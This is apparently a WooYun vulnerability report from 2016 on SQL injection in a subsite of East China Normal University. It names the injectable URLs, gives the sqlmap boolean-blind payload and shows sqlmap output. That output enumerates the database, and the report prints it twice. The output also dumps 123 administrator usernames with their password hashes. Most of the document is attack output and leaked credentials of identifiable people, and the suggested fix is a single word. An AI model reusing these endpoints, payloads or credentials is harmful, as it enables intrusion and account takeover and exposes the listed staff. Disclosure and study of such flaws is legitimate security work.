当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167457

漏洞标题:华东师范大学某分站存在多出sql注入漏洞

相关厂商:华东师范大学

漏洞作者: dloved

提交时间:2016-01-05 16:30

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-05: 细节已通知厂商并且等待厂商处理中
2016-01-06: 厂商已经确认,细节仅向厂商公开
2016-01-16: 细节向核心白帽子及相关领域专家公开
2016-01-26: 细节向普通白帽子公开
2016-02-05: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

华东师范大学某分站存在多出sql注入漏洞,可爆出123个管理员账号。

详细说明:

http://www.bs.ecnu.edu.cn/index.asp

11.png


注入点漏洞:
http://www.bs.ecnu.edu.cn/gonggao.asp?id=200
http://www.bs.ecnu.edu.cn/newshow.asp?id=1760
http://www.bs.ecnu.edu.cn/newshow.asp?id=1745
漏洞证明:
注入点;http://www.bs.ecnu.edu.cn/newshow.asp?id=1745
sqlmap identified the following injection points with a total of 79 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1760 AND 6691=6691
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1760 AND 6691=6691
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[8 tables]
+----------+
| user |
| admin |
| download |
| feedback |
| market |
| news |
| product |
| vote |
+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1760 AND 6691=6691
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[5 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| user | non-numeric |
| id | numeric |
| password | non-numeric |
| title | non-numeric |
| username | non-numeric |
+----------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1760 AND 6691=6691
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[123 entries]
+-----+-------+--------+----------------+------------------+
| id | title | user | username | password |
+-----+-------+--------+----------------+------------------+
| 100 | 华东师 | admin | fanqiuye | 6f8e812e225727b7 |
| 101 | 华东师 | admin | chenyanping | 0fb4047e75cf5323 |
| 102 | 华东师 | admin | chenchaomei | 5f5c25732940a279 |
| 103 | 华东师 | admin | jikangcai | db2f3781e47c4a32 |
| 104 | 华东师 | admin | zhuyoujun | f95f68c61e1c79fa |
| 105 | 华东师 | admin | yuhaiyan | 0eb61f5a4074be9e |
| 107 | 华东师 | admin | wangxiaomeng | a054e9ddeec78db0 |
| 108 | 华东师 | admin | maxiaoling | 06c19526e7f843d3 |
| 109 | 华东师 | admin | fuquansheng | 6506f13737b78cdb |
| 110 | 华东师 | admin | chenlin | 966bffa2c83657d6 |
| 111 | 华东师 | admin | lijingecnu | 09447d6d7e258d58 |
| 113 | 华东师 | admin | lizhen | 285d07fecb6a4b4c |
| 114 | 华东师 | admin | guobaiying | db528bd8e9d0f309 |
| 115 | 华东师 | admin | longcuihong | 594990ff82a168a4 |
| 116 | 华东师 | admin | chengguisun | e9aa2b28db575748 |
| 117 | 华东师 | admin | chenxiaojing | d66e31bdb870bb93 |
| 118 | 华东师 | admin | yangrong | 61a9c6a5a7ec5f0d |
| 119 | 华东师 | admin | wangsheng | 77d71a548753960a |
| 120 | 华东师 | admin | zhuangzhimin | a4ba2b5beaf9489a |
| 121 | 华东师 | admin | manchesxia | a5f5ec10201f918f |
| 122 | 华东师 | admin | caozhenxiang | 33c2331debbc5bb5 |
| 123 | 华东师 | admin | xujingjing | c652fed8fd402eb3 |
| 124 | 华东师 | admin | yangchengming | ccb12ab6c068fddb |
| 126 | 华东师 | admin | chenxiayang | aca534b89e3d2b56 |
| 127 | 华东师 | admin | dugang | 49ba59abbe56e057 |
| 129 | 华东师 | admin | sunxiaodong | 49ba59abbe56e057 |
| 135 | 华东师 | admin | xuxin | 9efb3b11ee758de3 |
| 136 | 华东师 | admin | lihua | 849a27d6969a7a3d |
| 137 | 华东师 | admin | lvjun | 54b9f4580926f04d |
| 138 | 华东师 | admin | nijun | 057e945011c1552f |
| 139 | 华东师 | admin | lijun | ee0e262d479a9873 |
| 140 | 华东师 | admin | gumin | 5d7c9563bb96cf35 |
| 141 | 华东师 | admin | bailu | db539770cdb941a1 |
| 142 | 华东师 | admin | liwei | a332dc2c7005f755 |
| 143 | 华东师 | admin | orec | 5938c4094b569c77 |
| 144 | 华东师 | admin | lufei | 630ee28d7722787c |
| 145 | 华东师 | admin | hkh | 375b0092e9a23b2a |
| 146 | 华东师 | admin | yihong | 9328af93b0f7828d |
| 147 | 华东师 | admin | chenhongxin | 0467bc0bf184e115 |
| 148 | 华东师 | admin | ruanguangce | e78a5dfc9ade3691 |
| 149 | 华东师 | admin | yuanyuan | 41d94839d5e3e87e |
| 150 | 华东师 | admin | jialijun | 9f472e1b8a1e8fda |
| 151 | 华东师 | admin | fengwei | 56952a124c9d701b |
| 153 | 华东师 | admin | zhaoxing | e83b92e8e9f40af8 |
| 154 | 华东师 | admin | lianyanling | e74aa37f9198e899 |
| 155 | 华东师 | admin | wangzhenyuan | d209aa49d09faaa5 |
| 156 | 华东师 | admin | ouyangxiaoling | 5b085dccec547e28 |
| 157 | 华东师 | admin | wangyuan | 2214cd26fadde8c3 |
| 158 | 华东师 | admin | zhaolinhua | 5567681e94fd72e0 |
| 159 | 华东师 | admin | wujianfei | ee361b51dd2f9967 |
| 160 | 华东师 | admin | dongzhiqing | 9d023f3440bda65f |
| 161 | 华东师 | admin | wanglinhui | f408ccf315c93a40 |
| 162 | 华东师 | admin | xuehaibo | 9693bc9d6500594c |
| 163 | 华东师 | admin | lenard | c8030d9488969c5d |
| 25 | 华东师 | admin | zhangyan | 97b17ce55e70abd2 |
| 26 | 华东师 | admin | jiangchen | 3da6c5a00731a4c7 |
| 27 | 华东师 | admin | sunbinyi | 99333317dbcdbf6f |
| 28 | 华东师 | admin | cuipei | 33d25685f478a69a |
| 29 | 华东师 | admin | guantao | 7690acaf95eb25b5 |
| 30 | 华东师 | admin | hujinxing | ce4ba172dda8fb1d |
| 31 | 华东师 | admin | mengxing | f55cb93dbe4e1ef5 |
| 32 | 华东师 | admin | pengjialiang | 3c43ee8166c7b0e8 |
| 33 | 华东师 | admin | wangshen | c865316fb9c4fa05 |
| 34 | 华东师 | admin | xiefuquan | f582d2f94def9ab0 |
| 35 | 华东师 | admin | huawei | 23f24ba11aae492f |
| 36 | 华东师 | admin | yangmuwang | 428f4925c8b594c2 |
| 38 | 华东师 | admin | wenyisheng | 32b1af6e821e61b9 |
| 39 | 华东师 | admin | wangrenwu | 7d3a712486a9e83f |
| 40 | 华东师 | admin | wangjue | 0f7980fd001085d9 |
| 41 | 华东师 | admin | qinchunrong | 3eca9327a52b5902 |
| 42 | 华东师 | admin | lujianping | 81c2805e79e73dc6 |
| 43 | 华东师 | admin | jinwugang | e11152a3ff59f52b |
| 44 | 华东师 | admin | duanyufeng | 439eb5d264da92b9 |
| 45 | 华东师 | admin | houjingchuan | 7442c1cffec9aec5 |
| 46 | 华东师 | admin | yuanyi | 7787f66d6d184570 |
| 47 | 华东师 | admin | longshengping | b377389cc4924b98 |
| 48 | 华东师 | admin | zhangyongyue | 88f6f0aa436daeff |
| 49 | 华东师 | admin | liguoqiu | 2637920c053be461 |
| 50 | 华东师 | admin | fanbingsi | 114ccc6d3ac1a5cf |
| 51 | 华东师 | admin | wuwenzhi | 603b718afbbaebf1 |
| 52 | 华东师 | admin | zhaoxingtie | 9dccd301aa5cade9 |
| 53 | 华东师 | admin | yangyong | a7e37ba37505d159 |
| 54 | 华东师 | admin | wangxiaoyun | 808795672a2b247d |
| 55 | 华东师 | admin | sunhouqin | 53e16d64e7b1e58f |
| 56 | 华东师 | admin | qiufudong | 4607074e86726900 |
| 57 | 华东师 | admin | lirong | 91c512c9b161cf34 |
| 59 | 华东师 | admin | dangning | ecf0113bc0cbc27c |
| 60 | 华东师 | admin | zhuangzhiming | d608dc7a30b43fe9 |
| 61 | 华东师 | admin | loujiajun | c26a81fc3f0b82dd |
| 62 | 华东师 | admin | fengxuegang | c9525581ceecfbf2 |
| 63 | 华东师 | admin | zhanghuinan | fd41041ab5a7c275 |
| 65 | 华东师 | admin | wangxueying | 1a37735ada4483a6 |
| 66 | 华东师 | admin | xiajiahua | 02ef0e4e6739cb52 |
| 67 | 华东师 | admin | panxiaoyun | c254c542a672042b |
| 70 | 华东师 | admin | houshijun | f004d1864b11f444 |
| 71 | 华东师 | admin | fangyi | 0c7d0ba842132f5c |
| 72 | 华东师 | admin | daiyong | 4685528576d526d3 |
| 73 | 华东师 | admin | chenguisun | 9d7614901a29c53e |
| 74 | 华东师 | admin | chenyouqi | b4c81f2e7e328909 |
| 76 | 华东师 | admin | huangyan | 39b15bb7584d4577 |
| 77 | 华东师 | admin | yangrongyi | cf1b30aa9a6e0f48 |
| 78 | 华东师 | admin | hejiaxun | aefda0659d440828 |
| 79 | 华东师 | admin | jinrungui | 94cd4fe98750ddfe |
| 8 | 华东师 | admin | admin | 1d1ac5d3a67a9c07 |
| 80 | 华东师 | admin | yilingfeng | 988921e3d42e05eb |
| 81 | 华东师 | admin | yinhong | ad186ccfedb4102f |
| 82 | 华东师 | admin | xiaoyan | 4bc912fbd00401a1 |
| 83 | 华东师 | admin | fangxiancang | 3e1b9c5293a4c75a |
| 84 | 华东师 | admin | xiepeiling | 0d0cfa7cbca6f5d0 |
| 85 | 华东师 | admin | guoxiaohe | 2bdee48148f49f6f |
| 86 | 华东师 | admin | zhangzuguo | 6449f51fffb74ad9 |
| 87 | 华东师 | admin | fuhongchun | 6014d6b2bac25e76 |
| 88 | 华东师 | admin | chenchengming | 5a6170b5d56b15ea |
| 89 | 华东师 | admin | yedelei | c0b40e5830b1ce9c |
| 90 | 华东师 | admin | chenlanqing | c1807f791e4b7683 |
| 91 | 华东师 | admin | yangrui | 0c845ce5795eb5fb |
| 92 | 华东师 | admin | shaoyuemei | e17c2255f9073fa2 |
| 93 | 华东师 | admin | wangjian | f3c37a7ada23e63a |
| 94 | 华东师 | admin | fengxiaofang | b1456ea7f9157332 |
| 95 | 华东师 | admin | luoying | 26d243dca372d73a |
| 96 | 华东师 | admin | huangzhiqiang | 0e5c05c8e0d8beb5 |
| 97 | 华东师 | admin | huangxi | e38b8ef1191a5deb |
| 98 | 华东师 | admin | huxiaochun | 0fc53a79afe20fd6 |
+-----+-------+--------+----------------+------------------+
检测到123个用户名和密码账号,但需要解密。

漏洞证明:

sqlmap identified the following injection points with a total of 79 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1760 AND 6691=6691
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1760 AND 6691=6691
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[8 tables]
+----------+
| user |
| admin |
| download |
| feedback |
| market |
| news |
| product |
| vote |
+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1760 AND 6691=6691
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[5 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| user | non-numeric |
| id | numeric |
| password | non-numeric |
| title | non-numeric |
| username | non-numeric |
+----------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1760 AND 6691=6691
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[123 entries]
+-----+-------+--------+----------------+------------------+
| id | title | user | username | password |
+-----+-------+--------+----------------+------------------+
| 100 | 华东师 | admin | fanqiuye | 6f8e812e225727b7 |
| 101 | 华东师 | admin | chenyanping | 0fb4047e75cf5323 |
| 102 | 华东师 | admin | chenchaomei | 5f5c25732940a279 |
| 103 | 华东师 | admin | jikangcai | db2f3781e47c4a32 |
| 104 | 华东师 | admin | zhuyoujun | f95f68c61e1c79fa |
| 105 | 华东师 | admin | yuhaiyan | 0eb61f5a4074be9e |
| 107 | 华东师 | admin | wangxiaomeng | a054e9ddeec78db0 |
| 108 | 华东师 | admin | maxiaoling | 06c19526e7f843d3 |
| 109 | 华东师 | admin | fuquansheng | 6506f13737b78cdb |
| 110 | 华东师 | admin | chenlin | 966bffa2c83657d6 |
| 111 | 华东师 | admin | lijingecnu | 09447d6d7e258d58 |
| 113 | 华东师 | admin | lizhen | 285d07fecb6a4b4c |
| 114 | 华东师 | admin | guobaiying | db528bd8e9d0f309 |
| 115 | 华东师 | admin | longcuihong | 594990ff82a168a4 |
| 116 | 华东师 | admin | chengguisun | e9aa2b28db575748 |
| 117 | 华东师 | admin | chenxiaojing | d66e31bdb870bb93 |
| 118 | 华东师 | admin | yangrong | 61a9c6a5a7ec5f0d |
| 119 | 华东师 | admin | wangsheng | 77d71a548753960a |
| 120 | 华东师 | admin | zhuangzhimin | a4ba2b5beaf9489a |
| 121 | 华东师 | admin | manchesxia | a5f5ec10201f918f |
| 122 | 华东师 | admin | caozhenxiang | 33c2331debbc5bb5 |
| 123 | 华东师 | admin | xujingjing | c652fed8fd402eb3 |
| 124 | 华东师 | admin | yangchengming | ccb12ab6c068fddb |
| 126 | 华东师 | admin | chenxiayang | aca534b89e3d2b56 |
| 127 | 华东师 | admin | dugang | 49ba59abbe56e057 |
| 129 | 华东师 | admin | sunxiaodong | 49ba59abbe56e057 |
| 135 | 华东师 | admin | xuxin | 9efb3b11ee758de3 |
| 136 | 华东师 | admin | lihua | 849a27d6969a7a3d |
| 137 | 华东师 | admin | lvjun | 54b9f4580926f04d |
| 138 | 华东师 | admin | nijun | 057e945011c1552f |
| 139 | 华东师 | admin | lijun | ee0e262d479a9873 |
| 140 | 华东师 | admin | gumin | 5d7c9563bb96cf35 |
| 141 | 华东师 | admin | bailu | db539770cdb941a1 |
| 142 | 华东师 | admin | liwei | a332dc2c7005f755 |
| 143 | 华东师 | admin | orec | 5938c4094b569c77 |
| 144 | 华东师 | admin | lufei | 630ee28d7722787c |
| 145 | 华东师 | admin | hkh | 375b0092e9a23b2a |
| 146 | 华东师 | admin | yihong | 9328af93b0f7828d |
| 147 | 华东师 | admin | chenhongxin | 0467bc0bf184e115 |
| 148 | 华东师 | admin | ruanguangce | e78a5dfc9ade3691 |
| 149 | 华东师 | admin | yuanyuan | 41d94839d5e3e87e |
| 150 | 华东师 | admin | jialijun | 9f472e1b8a1e8fda |
| 151 | 华东师 | admin | fengwei | 56952a124c9d701b |
| 153 | 华东师 | admin | zhaoxing | e83b92e8e9f40af8 |
| 154 | 华东师 | admin | lianyanling | e74aa37f9198e899 |
| 155 | 华东师 | admin | wangzhenyuan | d209aa49d09faaa5 |
| 156 | 华东师 | admin | ouyangxiaoling | 5b085dccec547e28 |
| 157 | 华东师 | admin | wangyuan | 2214cd26fadde8c3 |
| 158 | 华东师 | admin | zhaolinhua | 5567681e94fd72e0 |
| 159 | 华东师 | admin | wujianfei | ee361b51dd2f9967 |
| 160 | 华东师 | admin | dongzhiqing | 9d023f3440bda65f |
| 161 | 华东师 | admin | wanglinhui | f408ccf315c93a40 |
| 162 | 华东师 | admin | xuehaibo | 9693bc9d6500594c |
| 163 | 华东师 | admin | lenard | c8030d9488969c5d |
| 25 | 华东师 | admin | zhangyan | 97b17ce55e70abd2 |
| 26 | 华东师 | admin | jiangchen | 3da6c5a00731a4c7 |
| 27 | 华东师 | admin | sunbinyi | 99333317dbcdbf6f |
| 28 | 华东师 | admin | cuipei | 33d25685f478a69a |
| 29 | 华东师 | admin | guantao | 7690acaf95eb25b5 |
| 30 | 华东师 | admin | hujinxing | ce4ba172dda8fb1d |
| 31 | 华东师 | admin | mengxing | f55cb93dbe4e1ef5 |
| 32 | 华东师 | admin | pengjialiang | 3c43ee8166c7b0e8 |
| 33 | 华东师 | admin | wangshen | c865316fb9c4fa05 |
| 34 | 华东师 | admin | xiefuquan | f582d2f94def9ab0 |
| 35 | 华东师 | admin | huawei | 23f24ba11aae492f |
| 36 | 华东师 | admin | yangmuwang | 428f4925c8b594c2 |
| 38 | 华东师 | admin | wenyisheng | 32b1af6e821e61b9 |
| 39 | 华东师 | admin | wangrenwu | 7d3a712486a9e83f |
| 40 | 华东师 | admin | wangjue | 0f7980fd001085d9 |
| 41 | 华东师 | admin | qinchunrong | 3eca9327a52b5902 |
| 42 | 华东师 | admin | lujianping | 81c2805e79e73dc6 |
| 43 | 华东师 | admin | jinwugang | e11152a3ff59f52b |
| 44 | 华东师 | admin | duanyufeng | 439eb5d264da92b9 |
| 45 | 华东师 | admin | houjingchuan | 7442c1cffec9aec5 |
| 46 | 华东师 | admin | yuanyi | 7787f66d6d184570 |
| 47 | 华东师 | admin | longshengping | b377389cc4924b98 |
| 48 | 华东师 | admin | zhangyongyue | 88f6f0aa436daeff |
| 49 | 华东师 | admin | liguoqiu | 2637920c053be461 |
| 50 | 华东师 | admin | fanbingsi | 114ccc6d3ac1a5cf |
| 51 | 华东师 | admin | wuwenzhi | 603b718afbbaebf1 |
| 52 | 华东师 | admin | zhaoxingtie | 9dccd301aa5cade9 |
| 53 | 华东师 | admin | yangyong | a7e37ba37505d159 |
| 54 | 华东师 | admin | wangxiaoyun | 808795672a2b247d |
| 55 | 华东师 | admin | sunhouqin | 53e16d64e7b1e58f |
| 56 | 华东师 | admin | qiufudong | 4607074e86726900 |
| 57 | 华东师 | admin | lirong | 91c512c9b161cf34 |
| 59 | 华东师 | admin | dangning | ecf0113bc0cbc27c |
| 60 | 华东师 | admin | zhuangzhiming | d608dc7a30b43fe9 |
| 61 | 华东师 | admin | loujiajun | c26a81fc3f0b82dd |
| 62 | 华东师 | admin | fengxuegang | c9525581ceecfbf2 |
| 63 | 华东师 | admin | zhanghuinan | fd41041ab5a7c275 |
| 65 | 华东师 | admin | wangxueying | 1a37735ada4483a6 |
| 66 | 华东师 | admin | xiajiahua | 02ef0e4e6739cb52 |
| 67 | 华东师 | admin | panxiaoyun | c254c542a672042b |
| 70 | 华东师 | admin | houshijun | f004d1864b11f444 |
| 71 | 华东师 | admin | fangyi | 0c7d0ba842132f5c |
| 72 | 华东师 | admin | daiyong | 4685528576d526d3 |
| 73 | 华东师 | admin | chenguisun | 9d7614901a29c53e |
| 74 | 华东师 | admin | chenyouqi | b4c81f2e7e328909 |
| 76 | 华东师 | admin | huangyan | 39b15bb7584d4577 |
| 77 | 华东师 | admin | yangrongyi | cf1b30aa9a6e0f48 |
| 78 | 华东师 | admin | hejiaxun | aefda0659d440828 |
| 79 | 华东师 | admin | jinrungui | 94cd4fe98750ddfe |
| 8 | 华东师 | admin | admin | 1d1ac5d3a67a9c07 |
| 80 | 华东师 | admin | yilingfeng | 988921e3d42e05eb |
| 81 | 华东师 | admin | yinhong | ad186ccfedb4102f |
| 82 | 华东师 | admin | xiaoyan | 4bc912fbd00401a1 |
| 83 | 华东师 | admin | fangxiancang | 3e1b9c5293a4c75a |
| 84 | 华东师 | admin | xiepeiling | 0d0cfa7cbca6f5d0 |
| 85 | 华东师 | admin | guoxiaohe | 2bdee48148f49f6f |
| 86 | 华东师 | admin | zhangzuguo | 6449f51fffb74ad9 |
| 87 | 华东师 | admin | fuhongchun | 6014d6b2bac25e76 |
| 88 | 华东师 | admin | chenchengming | 5a6170b5d56b15ea |
| 89 | 华东师 | admin | yedelei | c0b40e5830b1ce9c |
| 90 | 华东师 | admin | chenlanqing | c1807f791e4b7683 |
| 91 | 华东师 | admin | yangrui | 0c845ce5795eb5fb |
| 92 | 华东师 | admin | shaoyuemei | e17c2255f9073fa2 |
| 93 | 华东师 | admin | wangjian | f3c37a7ada23e63a |
| 94 | 华东师 | admin | fengxiaofang | b1456ea7f9157332 |
| 95 | 华东师 | admin | luoying | 26d243dca372d73a |
| 96 | 华东师 | admin | huangzhiqiang | 0e5c05c8e0d8beb5 |
| 97 | 华东师 | admin | huangxi | e38b8ef1191a5deb |
| 98 | 华东师 | admin | huxiaochun | 0fc53a79afe20fd6 |
+-----+-------+--------+----------------+------------------+

修复方案:

过滤。。

版权声明:转载请注明来源 dloved@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-06 08:56

厂商回复:

通知二级单位处理。

最新状态:

暂无